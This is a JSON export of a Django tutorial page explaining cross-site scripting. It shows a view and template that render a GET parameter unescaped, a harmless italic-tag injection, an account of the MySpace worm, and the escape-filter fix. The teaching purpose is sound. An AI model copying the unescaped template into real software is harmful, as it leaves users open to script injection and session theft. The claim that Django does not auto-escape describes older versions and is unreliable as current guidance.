{"id":75960,"date":"2020-01-20T12:40:23","date_gmt":"2020-01-20T07:10:23","guid":{"rendered":"https:\/\/www.vskills.in\/certification\/tutorial\/?p=75960"},"modified":"2024-04-12T14:17:43","modified_gmt":"2024-04-12T08:47:43","slug":"cross-site-scripting-xss-2","status":"publish","type":"page","link":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","title":{"rendered":"Cross-Site Scripting (XSS)"},"content":{"rendered":"

Cross-site scripting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of <script> tags. Attackers often use XSS attacks to steal cookie and session information, or to trick users into giving private information to the wrong person (aka phishing). This type of attack can take a number of different forms and has almost infinite permutations, so we\u2019ll just look at a typical example. Consider this extremely simple \u201cHello, World\u201d view:<\/p>\n

def say_hello(request):
\nname = request.GET.get(‘name’, ‘world’)
\nreturn render_to_response(“hello.html”, {“name” : name})<\/p>\n

This view simply reads a name from a GET parameter and passes that name to the hello.html template. We might write a template for this view as follows:<\/p>\n

<h1>Hello, {{ name }}!<\/h1><\/p>\n

So if we accessed http:\/\/example.com\/hello\/name=Jacob, the rendered page would contain this:<\/p>\n

<h1>Hello, Jacob!<\/h1><\/p>\n

But wait \u2014 what happens if we access http:\/\/example.com\/hello\/name=<i>Jacob<\/i>? Then we get this:<\/p>\n

<h1>Hello, <i>Jacob<\/i>!<\/h1><\/p>\n

Of course, an attacker wouldn\u2019t use something as benign as <i> tags; he could include a whole set of HTML that hijacked your page with arbitrary content. This type of attack has been used to trick users into entering data into what looks like their bank\u2019s Web site, but in fact is an XSS-hijacked form that submits their back account information to an attacker.<\/p>\n

The problem gets worse if you store this data in the database and later display it it on your site. For example, MySpace was once found to be vulnerable to an XSS attack of this nature. A user inserted JavaScript into his profile that automatically added him as your friend when you visited his profile page. Within a few days, he had millions of friends. Now, this may sound relatively benign, but keep in mind that this attacker managed to get his code \u2014 not MySpace\u2019s \u2014 running on your computer. This violates the assumed trust that all the code on MySpace is actually written by MySpace. MySpace was extremely lucky that this malicious code didn\u2019t automatically delete viewers\u2019 accounts, change their passwords, flood the site with spam, or any of the other nightmare scenarios this vulnerability unleashes.<\/p>\n

The Solution<\/strong> – The solution is simple: always escape any content that might have come from a user. If we simply rewrite our template as follows:<\/p>\n

<h1>Hello, {{ name|escape }}!<\/h1><\/p>\n

then we\u2019re no longer vulnerable. You should always use the escape tag (or something equivalent) when displaying user-submitted content on your site.<\/p>\n

Why Doesn\u2019t Django Just Do This for You?<\/strong> – Modifying Django to automatically escape all variables displayed in templates is a frequent topic of discussion on the Django developer mailing list.So far, Django\u2019s templates have avoided this behavior because it subtly changes what should be relatively straightforward behavior (displaying variables). It\u2019s a tricky issue and a difficult tradeoff to evaluate. Adding hidden implicit behavior is against Django\u2019s core ideals (and Python\u2019s, for that matter), but security is equally important.<\/p>\n

All this is to say, then, that there\u2019s a fair chance Django will grow some form of auto-escaping (or nearly auto-escaping) behavior in the future. It\u2019s a good idea to check the official Django documentation for the latest in Django features; it will always be more up to date than this book, especially the print edition. Even if Django does add this feature, however, you should still be in the habit of asking yourself, at all times, \u201cWhere does this data come from?\u201d No automatic solution will ever protect your site from XSS attacks 100% of the time.<\/p>\n\n\n

Back to Tutorial<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Cross-site scripting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of <script> tags. Attackers often use XSS attacks to steal cookie and session information, or to trick users into…<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"categories":[8655],"tags":[2670],"class_list":["post-75960","page","type-page","status-publish","hentry","category-django-web-development","tag-cross-site-scripting-xss"],"acf":[],"yoast_head":"\nCross-Site Scripting (XSS) - Tutorial<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cross-Site Scripting (XSS) - Tutorial\" \/>\n<meta property=\"og:description\" content=\"Cross-site scripting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of <script> tags. Attackers often use XSS attacks to steal cookie and session information, or to trick users into...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\" \/>\n<meta property=\"og:site_name\" content=\"Tutorial\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/vskills.in\/\" \/>\n<meta property=\"article:modified_time\" content=\"2024-04-12T08:47:43+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\",\"url\":\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\",\"name\":\"Cross-Site Scripting (XSS) - Tutorial\",\"isPartOf\":{\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#website\"},\"datePublished\":\"2020-01-20T07:10:23+00:00\",\"dateModified\":\"2024-04-12T08:47:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.vskills.in\/certification\/tutorial\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cross-Site Scripting (XSS)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#website\",\"url\":\"https:\/\/www.vskills.in\/certification\/tutorial\/\",\"name\":\"Tutorial\",\"description\":\"Vskills - A initiative in elearning and certification\",\"publisher\":{\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.vskills.in\/certification\/tutorial\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#organization\",\"name\":\"Vskills\",\"url\":\"https:\/\/www.vskills.in\/certification\/tutorial\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.vskills.in\/certification\/tutorial\/wp-content\/uploads\/2017\/07\/vskills-min-logo.jpg\",\"contentUrl\":\"https:\/\/www.vskills.in\/certification\/tutorial\/wp-content\/uploads\/2017\/07\/vskills-min-logo.jpg\",\"width\":73,\"height\":55,\"caption\":\"Vskills\"},\"image\":{\"@id\":\"https:\/\/www.vskills.in\/certification\/tutorial\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/vskills.in\/\",\"https:\/\/x.com\/vskills_in\",\"https:\/\/www.linkedin.com\/company-beta\/1371554\/\",\"https:\/\/www.youtube.com\/channel\/UCMWnscxPwRF_PqXo9B7q_Tw\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cross-Site Scripting (XSS) - Tutorial","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","og_locale":"en_US","og_type":"article","og_title":"Cross-Site Scripting (XSS) - Tutorial","og_description":"Cross-site scripting (XSS), is found in Web applications that fail to escape user-submitted content properly before rendering it into HTML. This allows an attacker to insert arbitrary HTML into your Web page, usually in the form of <script> tags. Attackers often use XSS attacks to steal cookie and session information, or to trick users into...","og_url":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","og_site_name":"Tutorial","article_publisher":"https:\/\/www.facebook.com\/vskills.in\/","article_modified_time":"2024-04-12T08:47:43+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","url":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/","name":"Cross-Site Scripting (XSS) - Tutorial","isPartOf":{"@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#website"},"datePublished":"2020-01-20T07:10:23+00:00","dateModified":"2024-04-12T08:47:43+00:00","breadcrumb":{"@id":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/cross-site-scripting-xss-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.vskills.in\/certification\/tutorial\/"},{"@type":"ListItem","position":2,"name":"Cross-Site Scripting (XSS)"}]},{"@type":"WebSite","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#website","url":"https:\/\/www.vskills.in\/certification\/tutorial\/","name":"Tutorial","description":"Vskills - A initiative in elearning and certification","publisher":{"@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.vskills.in\/certification\/tutorial\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#organization","name":"Vskills","url":"https:\/\/www.vskills.in\/certification\/tutorial\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#\/schema\/logo\/image\/","url":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-content\/uploads\/2017\/07\/vskills-min-logo.jpg","contentUrl":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-content\/uploads\/2017\/07\/vskills-min-logo.jpg","width":73,"height":55,"caption":"Vskills"},"image":{"@id":"https:\/\/www.vskills.in\/certification\/tutorial\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/vskills.in\/","https:\/\/x.com\/vskills_in","https:\/\/www.linkedin.com\/company-beta\/1371554\/","https:\/\/www.youtube.com\/channel\/UCMWnscxPwRF_PqXo9B7q_Tw"]}]}},"_links":{"self":[{"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/pages\/75960","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/comments?post=75960"}],"version-history":[{"count":4,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/pages\/75960\/revisions"}],"predecessor-version":[{"id":83462,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/pages\/75960\/revisions\/83462"}],"wp:attachment":[{"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/media?parent=75960"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/categories?post=75960"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.vskills.in\/certification\/tutorial\/wp-json\/wp\/v2\/tags?post=75960"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}